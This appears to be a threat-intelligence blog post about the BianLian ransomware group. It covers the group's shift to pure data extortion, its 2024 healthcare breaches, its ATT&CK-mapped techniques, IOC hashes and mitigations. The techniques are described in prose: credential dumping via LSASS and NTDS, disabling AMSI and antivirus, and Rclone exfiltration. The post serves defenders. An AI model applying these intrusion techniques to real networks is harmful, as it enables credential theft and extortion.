BianLian's Shape-Shifting Tactics: From Encryption to Pure Extortion

Introduction

BianLian Ransomware

Cyber threats are escalating in frequency and sophistication, with BianLian emerging as a significant player targeting critical sectors such as healthcare, manufacturing, and professional services. Since its emergence in 2022, BianLian has demonstrated remarkable adaptability, shifting from a double-extortion model—where data is encrypted and exfiltrated—to a data-theft extortion strategy [1]. This evolution reflects the group's responsiveness to defensive measures and industry trends, notably following Avast's public release of a free decryptor in January 2023, which undermined their encryption-based ransom demands. 

This blog provides an in-depth analysis of BianLian's tactics, recent high-profile cases, and potential affiliations, offering cybersecurity professionals actionable insights into developing defenses against this adaptable threat actor.

History and Affiliations of BianLian Threat Group

BianLian first gained attention for its rapid development and deployment of customized ransomware tools, initially targeting critical infrastructure and sectors in the United States and Australia. The group initially used a traditional double-extortion model, encrypting data and exfiltrating sensitive information to coerce victims into paying ransoms.

However, after Avast released a free decryption tool in January 2023, BianLian shifted its focus to data exfiltration and extortion without encryption [2]. This strategic pivot allowed the group to continue its operations effectively, targeting sectors such as healthcare, manufacturing, and professional services (with examples provided in the following section) [3]. 

In terms of affiliations, Unit42 researchers have highlighted that BianLian appears to have connections with the Makop ransomware group. Both groups have been observed utilizing a customized .NET tool (see the IOC section) for file enumeration and data exfiltration. This shared toolset, along with similar tactics, techniques, and procedures (TTPs), suggests potential collaboration or a common source of services, possibly involving third-party developers. This overlap reflects a broader trend within the underground cybercrime community, where toolkits and methodologies are often shared, bought, or sold among various groups [3].

Notable Incidents and Attacks of BianLian Threat Group

Since emerging, the BianLian ransomware group has quickly risen to become one of the top three most active ransomware groups, ranking just behind LockBit3 and AlphV in the number of victim postings [4]. By 2024, BianLian has further expanded its operations, actively recruiting new developers and affiliates to bolster its capabilities.

The group's leak site displays a growing list of victims, primarily targeting organizations in the United States and Europe, with a notable increase in attacks across India and other regions [3]. The healthcare and manufacturing sectors have been especially affected, underscoring BianLian's focus on industries that handle sensitive, critical data [4].

This section will outline significant incidents and attacks carried out by the BianLian group.

Boston Children's Health Physicians (BCHP) Incident – September 2024

In September 2024, Boston Children's Health Physicians (BCHP), a pediatric network operating in New York and Connecticut, experienced a significant cyberattack attributed to the BianLian ransomware group [5]. The breach originated from an IT vendor's compromised systems, allowing unauthorized access to BCHP's network. 

The attackers exfiltrated sensitive data, including patient and employee information such as names, Social Security numbers, addresses, dates of birth, driver's license numbers, medical record numbers, health insurance details, billing information, and limited treatment data. Notably, BCHP's electronic medical record systems remained unaffected, as they operated on a separate network [6]. Upon discovering the breach on September 10, BCHP promptly initiated response protocols, including system shutdowns and engaging cybersecurity experts. Affected individuals were notified on October 4, with credit monitoring offered to those impacted.

BianLian Attacked Affiliated Dermatologists & Dermatologic Surgeons, P.A. – March 2024

In early March 2024, Affiliated Dermatologists (AD), a dermatology practice based in New Jersey, fell victim to a ransomware attack orchestrated by the BianLian group [7]. Between March 2 and March 5, unauthorized actors infiltrated AD's network, exfiltrating sensitive data.

The breach, confirmed on April 10, 2024, compromised the personal and medical information of approximately 373,379 individuals, including both patients and employees. The exposed data included names, addresses, dates of birth, Social Security numbers, medical treatment details, and health insurance information [8]. In response, AD promptly notified affected individuals and provided resources for identity theft protection.

Texas Retina Associates Stroked by BianLian Ransomware Group – April 2024

In April 2024, Texas Retina Associates, the largest ophthalmology practice in Texas, experienced a significant data breach attributed to the BianLian ransomware group [8]. The breach compromised the personal and medical information of approximately 312,867 patients, including names, contact details, dates of birth, medical record numbers, and health insurance information. 

Upon discovering the unauthorized access, Texas Retina Associates promptly secured its systems, enhanced cybersecurity measures, and notified affected individuals. The organization also established a helpline to assist patients with inquiries related to the breach. However, there was no mention of offering complimentary credit monitoring or identity protection services to those impacted.

Tactics, Techniques, and Procedures of BianLian

BianLian ransomware group employs a wide array of tactics, techniques, and procedures (TTPs) to gain and maintain access within victim networks, exfiltrate sensitive data, and extort organizations. Using the MITRE ATT&CK framework, we can map the group's activities to better understand their methods and operational tools.

Initial Access

Valid Accounts (MITRE ATT&CK T1078)

The BianLian group frequently uses valid account credentials compromised through phishing emails [9], particularly targeting Remote Desktop Protocol (RDP) access. By leveraging these legitimate credentials, often sourced from initial access brokers, BianLian gains direct and unauthorized entry into networks. This tactic (ATT&CK T1021.001) enables seamless infiltration and helps evade detection due to the use of authentic login details.

Exploitation of Remote Services (MITRE ATT&CK T1133)

BianLian has been observed exploiting vulnerabilities in remote services, including ProxyShell ([10]) and SonicWall VPN devices, to breach network defenses [11]. By targeting these vulnerabilities, the group gains a foothold within network environments, bypassing defensive measures.

Phishing (MITRE ATT&CK T1566) 

BianLian uses phishing techniques to trick victims into revealing sensitive information, including their login credentials. These campaigns often involve spear-phishing emails containing malicious attachments or links to compromised websites, facilitating unauthorized access to targeted systems [10]. 

Execution

Command and Scripting Interpreter (T1059 MITRE ATT&CK) 

• PowerShell (ATT&CK T1059.001) 
• Windows Command Shell (ATT&CK T1059.003)

BianLian utilizes built-in utilities like PowerShell and the Windows Command Shell to discreetly execute various malware-related functions (see the Defense Evasion section for a more in-depth example). 

Scheduled Task (MITRE ATT&CK T1053.005)

The group employs scheduled tasks to maintain persistence by scheduling the execution of backdoor payloads. This method ensures that their malicious processes are regularly executed, sustaining their control over compromised systems [12]. 

Persistence

Account Manipulation (MITRE ATT&CK T1098)

BianLian strengthens its foothold in compromised systems by enabling local administrator accounts and changing their passwords. This approach ensures persistent access and complicates defensive efforts [13].

Create Account: Local Account (MITRE ATT&CK T1136.001)

In line with the Account Manipulation, the group also employs the creation of local accounts to entrench their position within victim networks, ensuring that even if one access vector is closed, alternative routes remain available [13].

Defense Evasion

Modify Registry (T1112)

The group leverages the Windows Command Shell to perform various functions, including disabling security features and executing commands that facilitate control over infected systems.

For instance, they modify the Windows Registry to disable tamper protection for services like Sophos SAVEnabled, SEDEenabled, and SAVService, enabling them to uninstall these services [12]. 

Impair Defenses: Disable or Modify Tools (T1562.001)

The group utilizes PowerShell scripts to disable antivirus tools, specifically targeting Windows Defender and the Anti-Malware Scan Interface (AMSI) [12]. This tactic allows them to evade detection and execute further malicious commands. 

Here is an example PowerShell script example used by the BianLian threat group to disable AMSI.

Credential Access

OS Credential Dumping: LSASS Memory (T1003.001)

The group extracts credentials stored in the Local Security Authority Subsystem Service (LSASS) memory. By accessing LSASS, BianLian can obtain usernames and passwords in plaintext or hashed formats, facilitating lateral movement within the network. 

Here is an example TTP for LSASS memory dumping attack technique executed by BianLian.

This method allows them to impersonate legitimate users and escalate privileges. 

OS Credential Dumping: NTDS (MITRE ATT&CK T1003.003)

BianLian targets the NTDS.dit file, which contains Active Directory data, including user account information and password hashes. By extracting this file, the group gains access to a comprehensive list of credentials, enabling them to compromise multiple accounts and maintain persistent access. 

To facilitate these activities, BianLian utilizes tools such as secretsdump.py, part of the Impacket toolkit [14]. This tool allows them to extract password hashes and other credential data from remote systems, further enhancing their ability to move laterally and escalate privileges within the network. 

Discovery

Account Discovery: Domain Account (MITRE ATT&CK T1087.002)

The group queries domain controllers to enumerate user accounts, groups, and domain trusts, identifying potential lateral movement pathways. By executing commands like net user /domain, BianLian gathers information on domain user accounts, aiding in privilege escalation and further infiltration [3]. 

Permission Groups Discovery: Domain Groups (MITRE ATT&CK T1069.002)

BianLian identifies domain groups and their memberships to understand the organizational structure and locate high-privilege accounts. Commands such as net group /domain are utilized to list domain groups, providing insights into group memberships and associated permissions [3]. 

Network Service Discovery (MITRE ATT&CK T1046)

The group employs tools like Advanced Port Scanner to identify open ports and services running on networked systems. This information helps BianLian determine potential targets for exploitation and lateral movement within the network [3].  

Here is a TTP example used by the BianLian group.

Network Share Discovery (MITRE ATT&CK T1135)

BianLian uses tools such as SharpShares to enumerate accessible network shares. By identifying shared resources, the group can locate and exfiltrate sensitive information stored on networked systems [3]. 

Collection

Clipboard Data (MITRE ATT&CK T1115)

BianLian employs malware to capture data copied to the clipboard, potentially obtaining sensitive information transferred between applications. By monitoring clipboard activity, BianLian can intercept sensitive information such as passwords, personal identification numbers, or other confidential data that users copy and paste between applications. 

Command and Control

Ingress Tool Transfer (MITRE ATT&CK T1105)

The group transfers tools and payloads directly into compromised environments, facilitating further malicious activities without excessive exposure. By downloading additional modules and tools, BianLian can escalate privileges and establish a persistent foothold in the compromised system. 

Remote Access Software (MITRE ATT&CK T1219)

BianLian uses legitimate remote access software, such as TeamViewer, to maintain covert and interactive command and control capabilities over infected devices. This approach allows them to blend in with normal network traffic and evade detection. 

They have also been known to use other remote access tools like Atera Agent and SplashTop for similar purposes. 

Exfiltration

Transfer Data to Cloud Account (T1537)

The group utilizes tools like Rclone to exfiltrate collected data to cloud storage accounts under their control. By syncing files to cloud services, BianLian complicates detection and attribution efforts, as the data transfer blends with legitimate cloud operations.

For instance, they have been observed installing Rclone in typically unchecked folders, such as programdata\vmware and music folders, to avoid detection.

Exfiltration Over Alternative Protocol (T1048)

BianLian employs non-standard protocols, including File Transfer Protocol (FTP), to transfer sensitive data out of compromised environments. By using alternative protocols, the group masks their data transfer activities, making it more challenging for defenders to detect and mitigate the exfiltration. 

For example, they have been observed exfiltrating data via FTP to evade typical network-based exfiltration detection mechanisms. 

Indicators of Compromise (IOCs)

The following are the known Indicators of Compromise (IOCs) associated with the BianLian ransomware group. These IOCs include file hashes, IP addresses, and other relevant artifacts identified through various analyses and reports.

File Hashes

BianLian Backdoor IOCs (SHA-256)

c775e6d87a3bcc5e94cd055fee859bdb6350af033114fe8588d2d4d4f6d2a3ae

c57ca631b069745027d0b4f4d717821ca9bd095e28de2eafe4723eeaf4b062cf

c592194cea0acf3d3e181d2ba3108f0f86d74bcd8e49457981423f5f902d054b

df51b7b031ecc7c7fa899e17cce98b005576a20a199be670569d5e408d21048c

2ed448721f4e92c7970972f029290ee6269689c840a922982ac2f39c9a6a838f

264af7e7aa17422eb4299df640c1aa199b4778509697b6b296efa5ae7e957b40

73d095abf2f31358c8b1fb0d5a0dc9807e88d44282c896b5033c1b270d44111f

8b65c9437445e9bcb8164d8557ecb9e3585c8bebf37099a3ec1437884efbdd24

4ca84be5b6ab91694a0f81350cefe8379efcad692872a383671ce4209295edc7

Advanced Port Scanner

d0c1662ce239e4d288048c0e3324ec52962f6ddda77da0cb7af9c1d9c2f1e2eb

BianLian Custom .NET Tool

40126ae71b857dd22db39611c25d3d5dd0e60316b72830e930fba9baf23973ce

Mitigation and Defense Strategies

To effectively defend against BianLian ransomware attacks, organizations should implement a comprehensive cybersecurity strategy encompassing the following measures:

Strengthen Access Controls:

• Implement Multi-Factor Authentication (MFA): Require MFA for all user accounts, especially those with administrative privileges, to add an extra layer of security.
• Enforce Strong Password Policies: Mandate complex passwords and regular updates to reduce the risk of credential compromise.

Secure Remote Access:

• Restrict Remote Desktop Protocol (RDP) Access: Disable RDP if not essential. If necessary, limit access through virtual private networks (VPNs) and enforce strong authentication mechanisms.
• Monitor Remote Connections: Regularly review logs for unusual remote access activities to detect potential intrusions.

Enhance Email Security:

• Deploy Advanced Email Filtering: Utilize solutions that detect and block phishing emails, a common vector for BianLian's initial access.
• Conduct Employee Training: Educate staff to recognize and report phishing attempts, reinforcing a security-aware culture.

Implement Network Segmentation:

• Isolate Critical Systems: Separate essential services and data from the broader network to limit lateral movement in case of a breach.
• Control Inter-Segment Communication: Use firewalls and access controls to manage traffic between network segments.

Maintain Regular Data Backups:

• Adopt the 3-2-1 Backup Strategy: Keep three copies of data on two different media, with one stored offsite, ensuring data recovery without paying ransoms.
• Test Backup Restoration: Regularly verify that backups can be restored effectively to ensure data integrity.

Conclusion

Key Takeaways from BianLian Ransomware Attacks

BianLian's evolution from traditional ransomware encryption to a focus on data theft and extortion underscores its adaptability in the cyber threat landscape. By targeting critical sectors such as healthcare, manufacturing, and professional services, the group has demonstrated a sophisticated understanding of industry vulnerabilities. Their strategic shift reflects a keen awareness of defensive measures and law enforcement actions, enabling them to maintain a significant impact. For cybersecurity professionals, comprehending BianLian's tactics and methodologies is essential for developing robust defenses against this persistent and evolving threat actor.

References

[1] B. Toulas, "BianLian ransomware gang shifts focus to pure data extortion," BleepingComputer, Mar. 16, 2023. Available: https://www.bleepingcomputer.com/news/security/bianlian-ransomware-gang-shifts-focus-to-pure-data-extortion/

[2] A. Venkat, "BianLian ransomware group shifts focus to extortion," CSO Online, Mar. 20, 2023. Available: https://www.csoonline.com/article/574801/bianlian-ransomware-group-shifts-focus-to-extortion.html

[3] D. Frank, "Threat Assessment: BianLian," Unit 42, Jan. 23, 2024. Available: https://unit42.paloaltonetworks.com/bianlian-ransomware-group-threat-assessment/

[4] P. Kimayong, "BianLian Ransomware Group: 2024 Activity Analysis," Official Juniper Networks Blogs, Jul. 11, 2024. Available: https://blogs.juniper.net/en-us/security/bianlian-ransomware-group-2024-activity-analysis

[5] "Website." Available: https://www.hipaajournal.com/bianlian-cyberattack-boston-childrens-health-physicians/

[6] "Cybersecurity Announcement." Available: https://bchp.childrenshospital.org/cybersecurityannouncement

[7] "Website." Available: https://cybernews.com/news/affiliated-dermatologists-data-security-incident/

[8] "Affiliated Dermatologists says ransomware attack impacted over 370,000 patients and employees," teiss. Available: https://www.teiss.co.uk/news/affiliated-dermatologists-says-ransomware-attack-impacted-over-370000-patients-and-employees-14106

[9] T. S. Dutta, "BianLian Ransomware Leveraging RDP Credentials To Gain Initial Access," Cyber Security News, Jul. 15, 2024. Available: https://cybersecuritynews.com/bianlian-ransomware-rdp-access/

[10] L. Constantin, "BianLian group exploits TeamCity again, deploys PowerShell backdoor," CSO Online, Mar. 11, 2024. Available: https://www.csoonline.com/article/1312926/bianlian-group-exploits-teamcity-again-deploys-powershell-backdoor.html

[11] "BianLian," SentinelOne, Jun. 07, 2023. Available: https://www.sentinelone.com/anthology/bianlian/

[12] "Website." Available: https://www.mycert.org.my/portal/advisory?id=MA-941.062023

[13] "BianLian Ransomware Expanding C2 Infrastructure and Operational Tempo." Available: https://rhisac.org/threat-intelligence/bianlian-ransomware-expanding-c2-infrastructure-and-operational-tempo/

[14] A. Ribeiro, "US, Australian security agencies warn of BianLian group using valid RDP credentials to target organizations," Industrial Cyber, May 17, 2023. Available: https://industrialcyber.co/cisa/us-australian-security-agencies-warn-of-bianlian-group-using-valid-rdp-credentials-to-target-organizations/